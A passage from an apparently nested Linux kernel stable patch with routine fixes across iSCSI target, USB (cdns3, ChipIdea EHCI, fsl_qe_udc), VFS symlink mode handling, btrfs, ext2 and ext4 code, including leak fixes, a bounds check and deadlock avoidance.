+-		rb += sprintf(page+rb, "---------------------[iSCSI Session"
++		rb += sysfs_emit_at(page, rb, "---------------------[iSCSI Session"
+ 				" Values]-----------------------\n");
+-		rb += sprintf(page+rb, "  CmdSN/WR  :  CmdSN/WC  :  ExpCmdSN"
++		rb += sysfs_emit_at(page, rb, "  CmdSN/WR  :  CmdSN/WC  :  ExpCmdSN"
+ 				"  :  MaxCmdSN  :     ITT    :     TTT\n");
+ 		max_cmd_sn = (u32) atomic_read(&sess->max_cmd_sn);
+-		rb += sprintf(page+rb, " 0x%08x   0x%08x   0x%08x   0x%08x"
++		rb += sysfs_emit_at(page, rb, " 0x%08x   0x%08x   0x%08x   0x%08x"
+ 				"   0x%08x   0x%08x\n",
+ 			sess->cmdsn_window,
+ 			(max_cmd_sn - sess->exp_cmd_sn) + 1,
+ 			sess->exp_cmd_sn, max_cmd_sn,
+ 			sess->init_task_tag, sess->targ_xfer_tag);
+-		rb += sprintf(page+rb, "----------------------[iSCSI"
++		rb += sysfs_emit_at(page, rb, "----------------------[iSCSI"
+ 				" Connections]-------------------------\n");
+ 
+ 		spin_lock(&sess->conn_lock);
+ 		list_for_each_entry(conn, &sess->sess_conn_list, conn_list) {
+-			rb += sprintf(page+rb, "CID: %hu  Connection"
++			rb += sysfs_emit_at(page, rb, "CID: %hu  Connection"
+ 					" State: ", conn->cid);
+ 			switch (conn->conn_state) {
+ 			case TARG_CONN_STATE_FREE:
+-				rb += sprintf(page+rb,
++				rb += sysfs_emit_at(page, rb,
+ 					"TARG_CONN_STATE_FREE\n");
+ 				break;
+ 			case TARG_CONN_STATE_XPT_UP:
+-				rb += sprintf(page+rb,
++				rb += sysfs_emit_at(page, rb,
+ 					"TARG_CONN_STATE_XPT_UP\n");
+ 				break;
+ 			case TARG_CONN_STATE_IN_LOGIN:
+-				rb += sprintf(page+rb,
++				rb += sysfs_emit_at(page, rb,
+ 					"TARG_CONN_STATE_IN_LOGIN\n");
+ 				break;
+ 			case TARG_CONN_STATE_LOGGED_IN:
+-				rb += sprintf(page+rb,
++				rb += sysfs_emit_at(page, rb,
+ 					"TARG_CONN_STATE_LOGGED_IN\n");
+ 				break;
+ 			case TARG_CONN_STATE_IN_LOGOUT:
+-				rb += sprintf(page+rb,
++				rb += sysfs_emit_at(page, rb,
+ 					"TARG_CONN_STATE_IN_LOGOUT\n");
+ 				break;
+ 			case TARG_CONN_STATE_LOGOUT_REQUESTED:
+-				rb += sprintf(page+rb,
++				rb += sysfs_emit_at(page, rb,
+ 					"TARG_CONN_STATE_LOGOUT_REQUESTED\n");
+ 				break;
+ 			case TARG_CONN_STATE_CLEANUP_WAIT:
+-				rb += sprintf(page+rb,
++				rb += sysfs_emit_at(page, rb,
+ 					"TARG_CONN_STATE_CLEANUP_WAIT\n");
+ 				break;
+ 			default:
+-				rb += sprintf(page+rb,
++				rb += sysfs_emit_at(page, rb,
+ 					"ERROR: Unknown Connection State!\n");
+ 				break;
+ 			}
+ 
+-			rb += sprintf(page+rb, "   Address %pISc %s", &conn->login_sockaddr,
++			rb += sysfs_emit_at(page, rb, "   Address %pISc %s", &conn->login_sockaddr,
+ 				(conn->network_transport == ISCSI_TCP) ?
+ 				"TCP" : "SCTP");
+-			rb += sprintf(page+rb, "  StatSN: 0x%08x\n",
++			rb += sysfs_emit_at(page, rb, "  StatSN: 0x%08x\n",
+ 				conn->stat_sn);
+ 		}
+ 		spin_unlock(&sess->conn_lock);
+diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c
+index 687adc9e086ca..0686882bcbda3 100644
+--- a/drivers/target/target_core_transport.c
++++ b/drivers/target/target_core_transport.c
+@@ -264,6 +264,7 @@ void target_free_cmd_counter(struct target_cmd_counter *cmd_cnt)
+ 		percpu_ref_put(&cmd_cnt->refcnt);
+ 
+ 	percpu_ref_exit(&cmd_cnt->refcnt);
++	kfree(cmd_cnt);
+ }
+ EXPORT_SYMBOL_GPL(target_free_cmd_counter);
+ 
+diff --git a/drivers/tty/serial/cpm_uart/cpm_uart_core.c b/drivers/tty/serial/cpm_uart/cpm_uart_core.c
+index b4369ed45ae2d..bb25691f50007 100644
+--- a/drivers/tty/serial/cpm_uart/cpm_uart_core.c
++++ b/drivers/tty/serial/cpm_uart/cpm_uart_core.c
+@@ -1257,19 +1257,14 @@ static void cpm_uart_console_write(struct console *co, const char *s,
+ {
+ 	struct uart_cpm_port *pinfo = &cpm_uart_ports[co->index];
+ 	unsigned long flags;
+-	int nolock = oops_in_progress;
+ 
+-	if (unlikely(nolock)) {
++	if (unlikely(oops_in_progress)) {
+ 		local_irq_save(flags);
+-	} else {
+-		spin_lock_irqsave(&pinfo->port.lock, flags);
+-	}
+-
+-	cpm_uart_early_write(pinfo, s, count, true);
+-
+-	if (unlikely(nolock)) {
++		cpm_uart_early_write(pinfo, s, count, true);
+ 		local_irq_restore(flags);
+ 	} else {
++		spin_lock_irqsave(&pinfo->port.lock, flags);
++		cpm_uart_early_write(pinfo, s, count, true);
+ 		spin_unlock_irqrestore(&pinfo->port.lock, flags);
+ 	}
+ }
+diff --git a/drivers/usb/cdns3/cdns3-plat.c b/drivers/usb/cdns3/cdns3-plat.c
+index 2bc5d094548b6..726b2e4f67e4d 100644
+--- a/drivers/usb/cdns3/cdns3-plat.c
++++ b/drivers/usb/cdns3/cdns3-plat.c
+@@ -256,9 +256,10 @@ static int cdns3_controller_resume(struct device *dev, pm_message_t msg)
+ 	cdns3_set_platform_suspend(cdns->dev, false, false);
+ 
+ 	spin_lock_irqsave(&cdns->lock, flags);
+-	cdns_resume(cdns, !PMSG_IS_AUTO(msg));
++	cdns_resume(cdns);
+ 	cdns->in_lpm = false;
+ 	spin_unlock_irqrestore(&cdns->lock, flags);
++	cdns_set_active(cdns, !PMSG_IS_AUTO(msg));
+ 	if (cdns->wakeup_pending) {
+ 		cdns->wakeup_pending = false;
+ 		enable_irq(cdns->wakeup_irq);
+diff --git a/drivers/usb/cdns3/cdnsp-pci.c b/drivers/usb/cdns3/cdnsp-pci.c
+index 29f433c5a6f3f..a85db23fa19f2 100644
+--- a/drivers/usb/cdns3/cdnsp-pci.c
++++ b/drivers/usb/cdns3/cdnsp-pci.c
+@@ -210,8 +210,9 @@ static int __maybe_unused cdnsp_pci_resume(struct device *dev)
+ 	int ret;
+ 
+ 	spin_lock_irqsave(&cdns->lock, flags);
+-	ret = cdns_resume(cdns, 1);
++	ret = cdns_resume(cdns);
+ 	spin_unlock_irqrestore(&cdns->lock, flags);
++	cdns_set_active(cdns, 1);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/usb/cdns3/core.c b/drivers/usb/cdns3/core.c
+index dbcdf3b24b477..7b20d2d5c262e 100644
+--- a/drivers/usb/cdns3/core.c
++++ b/drivers/usb/cdns3/core.c
+@@ -522,9 +522,8 @@ int cdns_suspend(struct cdns *cdns)
+ }
+ EXPORT_SYMBOL_GPL(cdns_suspend);
+ 
+-int cdns_resume(struct cdns *cdns, u8 set_active)
++int cdns_resume(struct cdns *cdns)
+ {
+-	struct device *dev = cdns->dev;
+ 	enum usb_role real_role;
+ 	bool role_changed = false;
+ 	int ret = 0;
+@@ -556,15 +555,23 @@ int cdns_resume(struct cdns *cdns, u8 set_active)
+ 	if (cdns->roles[cdns->role]->resume)
+ 		cdns->roles[cdns->role]->resume(cdns, cdns_power_is_lost(cdns));
+ 
++	return 0;
++}
++EXPORT_SYMBOL_GPL(cdns_resume);
++
++void cdns_set_active(struct cdns *cdns, u8 set_active)
++{
++	struct device *dev = cdns->dev;
++
+ 	if (set_active) {
+ 		pm_runtime_disable(dev);
+ 		pm_runtime_set_active(dev);
+ 		pm_runtime_enable(dev);
+ 	}
+ 
+-	return 0;
++	return;
+ }
+-EXPORT_SYMBOL_GPL(cdns_resume);
++EXPORT_SYMBOL_GPL(cdns_set_active);
+ #endif /* CONFIG_PM_SLEEP */
+ 
+ MODULE_AUTHOR("Peter Chen <peter.chen@nxp.com>");
+diff --git a/drivers/usb/cdns3/core.h b/drivers/usb/cdns3/core.h
+index 2d332a788871e..4a4dbc2c15615 100644
+--- a/drivers/usb/cdns3/core.h
++++ b/drivers/usb/cdns3/core.h
+@@ -125,10 +125,13 @@ int cdns_init(struct cdns *cdns);
+ int cdns_remove(struct cdns *cdns);
+ 
+ #ifdef CONFIG_PM_SLEEP
+-int cdns_resume(struct cdns *cdns, u8 set_active);
++int cdns_resume(struct cdns *cdns);
+ int cdns_suspend(struct cdns *cdns);
++void cdns_set_active(struct cdns *cdns, u8 set_active);
+ #else /* CONFIG_PM_SLEEP */
+-static inline int cdns_resume(struct cdns *cdns, u8 set_active)
++static inline int cdns_resume(struct cdns *cdns)
++{ return 0; }
++static inline int cdns_set_active(struct cdns *cdns, u8 set_active)
+ { return 0; }
+ static inline int cdns_suspend(struct cdns *cdns)
+ { return 0; }
+diff --git a/drivers/usb/chipidea/ci.h b/drivers/usb/chipidea/ci.h
+index 85a803c135ab3..2ff83911219f8 100644
+--- a/drivers/usb/chipidea/ci.h
++++ b/drivers/usb/chipidea/ci.h
+@@ -253,6 +253,7 @@ struct ci_hdrc {
+ 	bool				id_event;
+ 	bool				b_sess_valid_event;
+ 	bool				imx28_write_fix;
++	bool				has_portsc_pec_bug;
+ 	bool				supports_runtime_pm;
+ 	bool				in_lpm;
+ 	bool				wakeup_int;
+diff --git a/drivers/usb/chipidea/ci_hdrc_imx.c b/drivers/usb/chipidea/ci_hdrc_imx.c
+index caa91117ba429..984087bbf3e2b 100644
+--- a/drivers/usb/chipidea/ci_hdrc_imx.c
++++ b/drivers/usb/chipidea/ci_hdrc_imx.c
+@@ -67,11 +67,13 @@ static const struct ci_hdrc_imx_platform_flag imx7d_usb_data = {
+ 
+ static const struct ci_hdrc_imx_platform_flag imx7ulp_usb_data = {
+ 	.flags = CI_HDRC_SUPPORTS_RUNTIME_PM |
++		CI_HDRC_HAS_PORTSC_PEC_MISSED |
+ 		CI_HDRC_PMQOS,
+ };
+ 
+ static const struct ci_hdrc_imx_platform_flag imx8ulp_usb_data = {
+-	.flags = CI_HDRC_SUPPORTS_RUNTIME_PM,
++	.flags = CI_HDRC_SUPPORTS_RUNTIME_PM |
++		CI_HDRC_HAS_PORTSC_PEC_MISSED,
+ };
+ 
+ static const struct of_device_id ci_hdrc_imx_dt_ids[] = {
+diff --git a/drivers/usb/chipidea/core.c b/drivers/usb/chipidea/core.c
+index 71f172ecfaabc..b9227f41cf1c0 100644
+--- a/drivers/usb/chipidea/core.c
++++ b/drivers/usb/chipidea/core.c
+@@ -1038,6 +1038,8 @@ static int ci_hdrc_probe(struct platform_device *pdev)
+ 		CI_HDRC_IMX28_WRITE_FIX);
+ 	ci->supports_runtime_pm = !!(ci->platdata->flags &
+ 		CI_HDRC_SUPPORTS_RUNTIME_PM);
++	ci->has_portsc_pec_bug = !!(ci->platdata->flags &
++		CI_HDRC_HAS_PORTSC_PEC_MISSED);
+ 	platform_set_drvdata(pdev, ci);
+ 
+ 	ret = hw_device_init(ci, base);
+diff --git a/drivers/usb/chipidea/host.c b/drivers/usb/chipidea/host.c
+index bc3634a54c6b7..3b08c5e811707 100644
+--- a/drivers/usb/chipidea/host.c
++++ b/drivers/usb/chipidea/host.c
+@@ -151,6 +151,7 @@ static int host_start(struct ci_hdrc *ci)
+ 	ehci->has_hostpc = ci->hw_bank.lpm;
+ 	ehci->has_tdi_phy_lpm = ci->hw_bank.lpm;
+ 	ehci->imx28_write_fix = ci->imx28_write_fix;
++	ehci->has_ci_pec_bug = ci->has_portsc_pec_bug;
+ 
+ 	priv = (struct ehci_ci_priv *)ehci->priv;
+ 	priv->reg_vbus = NULL;
+diff --git a/drivers/usb/gadget/udc/fsl_qe_udc.c b/drivers/usb/gadget/udc/fsl_qe_udc.c
+index 3b1cc8fa30c83..72b6d74b34982 100644
+--- a/drivers/usb/gadget/udc/fsl_qe_udc.c
++++ b/drivers/usb/gadget/udc/fsl_qe_udc.c
+@@ -1959,9 +1959,13 @@ static void ch9getstatus(struct qe_udc *udc, u8 request_type, u16 value,
+ 	} else if ((request_type & USB_RECIP_MASK) == USB_RECIP_ENDPOINT) {
+ 		/* Get endpoint status */
+ 		int pipe = index & USB_ENDPOINT_NUMBER_MASK;
+-		struct qe_ep *target_ep = &udc->eps[pipe];
++		struct qe_ep *target_ep;
+ 		u16 usep;
+ 
++		if (pipe >= USB_MAX_ENDPOINTS)
++			goto stall;
++		target_ep = &udc->eps[pipe];
++
+ 		/* stall if endpoint doesn't exist */
+ 		if (!target_ep->ep.desc)
+ 			goto stall;
+diff --git a/drivers/usb/host/ehci-hcd.c b/drivers/usb/host/ehci-hcd.c
+index a1930db0da1c3..802bfafb1012b 100644
+--- a/drivers/usb/host/ehci-hcd.c
++++ b/drivers/usb/host/ehci-hcd.c
+@@ -755,10 +755,14 @@ restart:
+ 
+ 	/* normal [4.15.1.2] or error [4.15.1.1] completion */
+ 	if (likely ((status & (STS_INT|STS_ERR)) != 0)) {
+-		if (likely ((status & STS_ERR) == 0))
++		if (likely ((status & STS_ERR) == 0)) {
+ 			INCR(ehci->stats.normal);
+-		else
++		} else {
++			/* Force to check port status */
++			if (ehci->has_ci_pec_bug)
++				status |= STS_PCD;
+ 			INCR(ehci->stats.error);
++		}
+ 		bh = 1;
+ 	}
+ 
+diff --git a/drivers/usb/host/ehci-hub.c b/drivers/usb/host/ehci-hub.c
+index efe30e3be22f7..1aee392e84927 100644
+--- a/drivers/usb/host/ehci-hub.c
++++ b/drivers/usb/host/ehci-hub.c
+@@ -674,7 +674,8 @@ ehci_hub_status_data (struct usb_hcd *hcd, char *buf)
+ 
+ 		if ((temp & mask) != 0 || test_bit(i, &ehci->port_c_suspend)
+ 				|| (ehci->reset_done[i] && time_after_eq(
+-					jiffies, ehci->reset_done[i]))) {
++					jiffies, ehci->reset_done[i]))
++				|| ehci_has_ci_pec_bug(ehci, temp)) {
+ 			if (i < 7)
+ 			    buf [0] |= 1 << (i + 1);
+ 			else
+@@ -875,6 +876,13 @@ int ehci_hub_control(
+ 		if (temp & PORT_PEC)
+ 			status |= USB_PORT_STAT_C_ENABLE << 16;
+ 
++		if (ehci_has_ci_pec_bug(ehci, temp)) {
++			status |= USB_PORT_STAT_C_ENABLE << 16;
++			ehci_info(ehci,
++				"PE is cleared by HW port:%d PORTSC:%08x\n",
++				wIndex + 1, temp);
++		}
++
+ 		if ((temp & PORT_OCC) && (!ignore_oc && !ehci->spurious_oc)){
+ 			status |= USB_PORT_STAT_C_OVERCURRENT << 16;
+ 
+diff --git a/drivers/usb/host/ehci.h b/drivers/usb/host/ehci.h
+index ad3f13a3eaf1b..5c0e25742e179 100644
+--- a/drivers/usb/host/ehci.h
++++ b/drivers/usb/host/ehci.h
+@@ -207,6 +207,7 @@ struct ehci_hcd {			/* one per controller */
+ 	unsigned		has_fsl_port_bug:1; /* FreeScale */
+ 	unsigned		has_fsl_hs_errata:1;	/* Freescale HS quirk */
+ 	unsigned		has_fsl_susp_errata:1;	/* NXP SUSP quirk */
++	unsigned		has_ci_pec_bug:1;	/* ChipIdea PEC bug */
+ 	unsigned		big_endian_mmio:1;
+ 	unsigned		big_endian_desc:1;
+ 	unsigned		big_endian_capbase:1;
+@@ -707,6 +708,15 @@ ehci_port_speed(struct ehci_hcd *ehci, unsigned int portsc)
+  */
+ #define ehci_has_fsl_susp_errata(e)	((e)->has_fsl_susp_errata)
+ 
++/*
++ * Some Freescale/NXP processors using ChipIdea IP have a bug in which
++ * disabling the port (PE is cleared) does not cause PEC to be asserted
++ * when frame babble is detected.
++ */
++#define ehci_has_ci_pec_bug(e, portsc) \
++	((e)->has_ci_pec_bug && ((e)->command & CMD_PSE) \
++	 && !(portsc & PORT_PEC) && !(portsc & PORT_PE))
++
+ /*
+  * While most USB host controllers implement their registers in
+  * little-endian format, a minority (celleb companion chip) implement
+diff --git a/fs/attr.c b/fs/attr.c
+index 9b9a70e0cc54f..3172f57f71f8d 100644
+--- a/fs/attr.c
++++ b/fs/attr.c
+@@ -394,9 +394,25 @@ int notify_change(struct user_namespace *mnt_userns, struct dentry *dentry,
+ 		return error;
+ 
+ 	if ((ia_valid & ATTR_MODE)) {
+-		umode_t amode = attr->ia_mode;
++		/*
++		 * Don't allow changing the mode of symlinks:
++		 *
++		 * (1) The vfs doesn't take the mode of symlinks into account
++		 *     during permission checking.
++		 * (2) This has never worked correctly. Most major filesystems
++		 *     did return EOPNOTSUPP due to interactions with POSIX ACLs
++		 *     but did still updated the mode of the symlink.
++		 *     This inconsistency led system call wrapper providers such
++		 *     as libc to block changing the mode of symlinks with
++		 *     EOPNOTSUPP already.
++		 * (3) To even do this in the first place one would have to use
++		 *     specific file descriptors and quite some effort.
++		 */
++		if (S_ISLNK(inode->i_mode))
++			return -EOPNOTSUPP;
++
+ 		/* Flag setting protected by i_mutex */
+-		if (is_sxid(amode))
++		if (is_sxid(attr->ia_mode))
+ 			inode->i_flags &= ~S_NOSEC;
+ 	}
+ 
+diff --git a/fs/autofs/waitq.c b/fs/autofs/waitq.c
+index 54c1f8b8b0757..efdc76732faed 100644
+--- a/fs/autofs/waitq.c
++++ b/fs/autofs/waitq.c
+@@ -32,8 +32,9 @@ void autofs_catatonic_mode(struct autofs_sb_info *sbi)
+ 		wq->status = -ENOENT; /* Magic is gone - report failure */
+ 		kfree(wq->name.name - wq->offset);
+ 		wq->name.name = NULL;
+-		wq->wait_ctr--;
+ 		wake_up_interruptible(&wq->queue);
++		if (!--wq->wait_ctr)
++			kfree(wq);
+ 		wq = nwq;
+ 	}
+ 	fput(sbi->pipe);	/* Close the pipe */
+diff --git a/fs/btrfs/delayed-inode.c b/fs/btrfs/delayed-inode.c
+index cac5169eaf8de..d2cbb7733c7d6 100644
+--- a/fs/btrfs/delayed-inode.c
++++ b/fs/btrfs/delayed-inode.c
+@@ -1148,20 +1148,33 @@ static int __btrfs_run_delayed_items(struct btrfs_trans_handle *trans, int nr)
+ 		ret = __btrfs_commit_inode_delayed_items(trans, path,
+ 							 curr_node);
+ 		if (ret) {
+-			btrfs_release_delayed_node(curr_node);
+-			curr_node = NULL;
+ 			btrfs_abort_transaction(trans, ret);
+ 			break;
+ 		}
+ 
+ 		prev_node = curr_node;
+ 		curr_node = btrfs_next_delayed_node(curr_node);
++		/*
++		 * See the comment below about releasing path before releasing
++		 * node. If the commit of delayed items was successful the path
++		 * should always be released, but in case of an error, it may
++		 * point to locked extent buffers (a leaf at the very least).
++		 */
++		ASSERT(path->nodes[0] == NULL);
+ 		btrfs_release_delayed_node(prev_node);
+ 	}
+ 
++	/*
++	 * Release the path to avoid a potential deadlock and lockdep splat when
++	 * releasing the delayed node, as that requires taking the delayed node's
++	 * mutex. If another task starts running delayed items before we take
++	 * the mutex, it will first lock the mutex and then it may try to lock
++	 * the same btree path (leaf).
++	 */
++	btrfs_free_path(path);
++
+ 	if (curr_node)
+ 		btrfs_release_delayed_node(curr_node);
+-	btrfs_free_path(path);
+ 	trans->block_rsv = block_rsv;
+ 
+ 	return ret;
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 64daae693afd1..d1dae29a3d012 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -859,6 +859,7 @@ static bool btree_dirty_folio(struct address_space *mapping,
+ 		struct folio *folio)
+ {
+ 	struct btrfs_fs_info *fs_info = btrfs_sb(mapping->host->i_sb);
++	struct btrfs_subpage_info *spi = fs_info->subpage_info;
+ 	struct btrfs_subpage *subpage;
+ 	struct extent_buffer *eb;
+ 	int cur_bit = 0;
+@@ -872,18 +873,19 @@ static bool btree_dirty_folio(struct address_space *mapping,
+ 		btrfs_assert_tree_write_locked(eb);
+ 		return filemap_dirty_folio(mapping, folio);
+ 	}
++
++	ASSERT(spi);
+ 	subpage = folio_get_private(folio);
+ 
+-	ASSERT(subpage->dirty_bitmap);
+-	while (cur_bit < BTRFS_SUBPAGE_BITMAP_SIZE) {
++	for (cur_bit = spi->dirty_offset;
++	     cur_bit < spi->dirty_offset + spi->bitmap_nr_bits;
++	     cur_bit++) {
+ 		unsigned long flags;
+ 		u64 cur;
+-		u16 tmp = (1 << cur_bit);
+ 
+ 		spin_lock_irqsave(&subpage->lock, flags);
+-		if (!(tmp & subpage->dirty_bitmap)) {
++		if (!test_bit(cur_bit, subpage->bitmaps)) {
+ 			spin_unlock_irqrestore(&subpage->lock, flags);
+-			cur_bit++;
+ 			continue;
+ 		}
+ 		spin_unlock_irqrestore(&subpage->lock, flags);
+@@ -896,7 +898,7 @@ static bool btree_dirty_folio(struct address_space *mapping,
+ 		btrfs_assert_tree_write_locked(eb);
+ 		free_extent_buffer(eb);
+ 
+-		cur_bit += (fs_info->nodesize >> fs_info->sectorsize_bits);
++		cur_bit += (fs_info->nodesize >> fs_info->sectorsize_bits) - 1;
+ 	}
+ 	return filemap_dirty_folio(mapping, folio);
+ }
+@@ -2728,13 +2730,11 @@ int btrfs_validate_super(struct btrfs_fs_info *fs_info,
+ 		ret = -EINVAL;
+ 	}
+ 
+-	if (btrfs_fs_incompat(fs_info, METADATA_UUID) &&
+-	    memcmp(fs_info->fs_devices->metadata_uuid,
+-		   fs_info->super_copy->metadata_uuid, BTRFS_FSID_SIZE)) {
++	if (memcmp(fs_info->fs_devices->metadata_uuid, btrfs_sb_fsid_ptr(sb),
++		   BTRFS_FSID_SIZE) != 0) {
+ 		btrfs_err(fs_info,
+ "superblock metadata_uuid doesn't match metadata uuid of fs_devices: %pU != %pU",
+-			fs_info->super_copy->metadata_uuid,
+-			fs_info->fs_devices->metadata_uuid);
++			  btrfs_sb_fsid_ptr(sb), fs_info->fs_devices->metadata_uuid);
+ 		ret = -EINVAL;
+ 	}
+ 
+diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c
+index 0640ef59fe660..08ff10a81cb90 100644
+--- a/fs/btrfs/extent-tree.c
++++ b/fs/btrfs/extent-tree.c
+@@ -863,6 +863,11 @@ again:
+ 		err = -ENOENT;
+ 		goto out;
+ 	} else if (WARN_ON(ret)) {
++		btrfs_print_leaf(path->nodes[0]);
++		btrfs_err(fs_info,
++"extent item not found for insert, bytenr %llu num_bytes %llu parent %llu root_objectid %llu owner %llu offset %llu",
++			  bytenr, num_bytes, parent, root_objectid, owner,
++			  offset);
+ 		err = -EIO;
+ 		goto out;
+ 	}
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 9de647e48e7eb..2e29fafe0e7d9 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -2850,6 +2850,13 @@ static int btrfs_search_path_in_tree_user(struct user_namespace *mnt_userns,
+ 				goto out_put;
+ 			}
+ 
++			/*
++			 * We don't need the path anymore, so release it and
++			 * avoid deadlocks and lockdep warnings in case
++			 * btrfs_iget() needs to lookup the inode from its root
++			 * btree and lock the same leaf.
++			 */
++			btrfs_release_path(path);
+ 			temp_inode = btrfs_iget(sb, key2.objectid, root);
+ 			if (IS_ERR(temp_inode)) {
+ 				ret = PTR_ERR(temp_inode);
+@@ -2870,7 +2877,6 @@ static int btrfs_search_path_in_tree_user(struct user_namespace *mnt_userns,
+ 				goto out_put;
+ 			}
+ 
+-			btrfs_release_path(path);
+ 			key.objectid = key.offset;
+ 			key.offset = (u64)-1;
+ 			dirid = key.objectid;
+diff --git a/fs/btrfs/ordered-data.c b/fs/btrfs/ordered-data.c
+index e54f8280031fa..bd0c7157e3878 100644
+--- a/fs/btrfs/ordered-data.c
++++ b/fs/btrfs/ordered-data.c
+@@ -580,7 +580,7 @@ void btrfs_remove_ordered_extent(struct btrfs_inode *btrfs_inode,
+ 			refcount_inc(&trans->use_count);
+ 		spin_unlock(&fs_info->trans_lock);
+ 
+-		ASSERT(trans);
++		ASSERT(trans || BTRFS_FS_ERROR(fs_info));
+ 		if (trans) {
+ 			if (atomic_dec_and_test(&trans->pending_ordered))
+ 				wake_up(&trans->pending_wait);
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 567c5c010f931..a40ebd2321d01 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -663,6 +663,14 @@ error_free_page:
+ 	return -EINVAL;
+ }
+ 
++u8 *btrfs_sb_fsid_ptr(struct btrfs_super_block *sb)
++{
++	bool has_metadata_uuid = (btrfs_super_incompat_flags(sb) &
++				  BTRFS_FEATURE_INCOMPAT_METADATA_UUID);
++
++	return has_metadata_uuid ? sb->metadata_uuid : sb->fsid;
++}
++
+ /*
+  * Handle scanned device having its CHANGING_FSID_V2 flag set and the fs_devices
+  * being created with a disk that has already completed its fsid change. Such
+diff --git a/fs/btrfs/volumes.h b/fs/btrfs/volumes.h
+index 099def5613b87..ec2260177038e 100644
+--- a/fs/btrfs/volumes.h
++++ b/fs/btrfs/volumes.h
+@@ -757,5 +757,6 @@ int btrfs_verify_dev_extents(struct btrfs_fs_info *fs_info);
+ bool btrfs_repair_one_zone(struct btrfs_fs_info *fs_info, u64 logical);
+ 
+ bool btrfs_pinned_by_swapfile(struct btrfs_fs_info *fs_info, void *ptr);
++u8 *btrfs_sb_fsid_ptr(struct btrfs_super_block *sb);
+ 
+ #endif
+diff --git a/fs/ext2/xattr.c b/fs/ext2/xattr.c
+index 641abfa4b718a..2f89b1073307b 100644
+--- a/fs/ext2/xattr.c
++++ b/fs/ext2/xattr.c
+@@ -744,10 +744,10 @@ ext2_xattr_set2(struct inode *inode, struct buffer_head *old_bh,
+ 			/* We need to allocate a new block */
+ 			ext2_fsblk_t goal = ext2_group_first_block_no(sb,
+ 						EXT2_I(inode)->i_block_group);
+-			int block = ext2_new_block(inode, goal, &error);
++			ext2_fsblk_t block = ext2_new_block(inode, goal, &error);
+ 			if (error)
+ 				goto cleanup;
+-			ea_idebug(inode, "creating block %d", block);
++			ea_idebug(inode, "creating block %lu", block);
+ 
+ 			new_bh = sb_getblk(sb, block);
+ 			if (unlikely(!new_bh)) {
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 6a08fc31a66de..bbfb37390723c 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -343,17 +343,17 @@ static struct ext4_dir_entry_tail *get_dirent_tail(struct inode *inode,
+ 						   struct buffer_head *bh)
+ {
+ 	struct ext4_dir_entry_tail *t;
++	int blocksize = EXT4_BLOCK_SIZE(inode->i_sb);
+ 
+ #ifdef PARANOID
+ 	struct ext4_dir_entry *d, *top;
+ 
+ 	d = (struct ext4_dir_entry *)bh->b_data;
+ 	top = (struct ext4_dir_entry *)(bh->b_data +
+-		(EXT4_BLOCK_SIZE(inode->i_sb) -
+-		 sizeof(struct ext4_dir_entry_tail)));
+-	while (d < top && d->rec_len)
++		(blocksize - sizeof(struct ext4_dir_entry_tail)));
++	while (d < top && ext4_rec_len_from_disk(d->rec_len, blocksize))
+ 		d = (struct ext4_dir_entry *)(((void *)d) +
+-		    le16_to_cpu(d->rec_len));
++		    ext4_rec_len_from_disk(d->rec_len, blocksize));
+ 
+ 	if (d != top)
+ 		return NULL;
+@@ -364,7 +364,8 @@ static struct ext4_dir_entry_tail *get_dirent_tail(struct inode *inode,
+ #endif
+ 
+ 	if (t->det_reserved_zero1 ||
+-	    le16_to_cpu(t->det_rec_len) != sizeof(struct ext4_dir_entry_tail) ||
++	    (ext4_rec_len_from_disk(t->det_rec_len, blocksize) !=
++	     sizeof(struct ext4_dir_entry_tail)) ||
+ 	    t->det_reserved_zero2 ||
+ 	    t->det_reserved_ft != EXT4_FT_DIR_CSUM)
+ 		return NULL;
+@@ -445,13 +446,14 @@ static struct dx_countlimit *get_dx_countlimit(struct inode *inode,
+ 	struct ext4_dir_entry *dp;
+ 	struct dx_root_info *root;
+ 	int count_offset;
++	int blocksize = EXT4_BLOCK_SIZE(inode->i_sb);
++	unsigned int rlen = ext4_rec_len_from_disk(dirent->rec_len, blocksize);
+ 
+-	if (le16_to_cpu(dirent->rec_len) == EXT4_BLOCK_SIZE(inode->i_sb))
++	if (rlen == blocksize)
+ 		count_offset = 8;
+-	else if (le16_to_cpu(dirent->rec_len) == 12) {
++	else if (rlen == 12) {
+ 		dp = (struct ext4_dir_entry *)(((void *)dirent) + 12);
+-		if (le16_to_cpu(dp->rec_len) !=
+-		    EXT4_BLOCK_SIZE(inode->i_sb) - 12)
++		if (ext4_rec_len_from_disk(dp->rec_len, blocksize) != blocksize - 12)
+ 			return NULL;
+ 		root = (struct dx_root_info *)(((void *)dp + 12));
+ 		if (root->reserved_zero ||
+@@ -1315,6 +1317,7 @@ static int dx_make_map(struct inode *dir, struct buffer_head *bh,
+ 	unsigned int buflen = bh->b_size;
+ 	char *base = bh->b_data;
+ 	struct dx_hash_info h = *hinfo;
++	int blocksize = EXT4_BLOCK_SIZE(dir->i_sb);
+ 
+ 	if (ext4_has_metadata_csum(dir->i_sb))
+ 		buflen -= sizeof(struct ext4_dir_entry_tail);
+@@ -1335,11 +1338,12 @@ static int dx_make_map(struct inode *dir, struct buffer_head *bh,
+ 			map_tail--;
+ 			map_tail->hash = h.hash;
+ 			map_tail->offs = ((char *) de - base)>>2;
+-			map_tail->size = le16_to_cpu(de->rec_len);
++			map_tail->size = ext4_rec_len_from_disk(de->rec_len,
++								blocksize);
+ 			count++;
+ 			cond_resched();
+ 		}
+-		de = ext4_next_entry(de, dir->i_sb->s_blocksize);
++		de = ext4_next_entry(de, blocksize);
+ 	}
+ 	return count;
+ }
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index bd4ef43b02033..e9d075cbd71ad 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
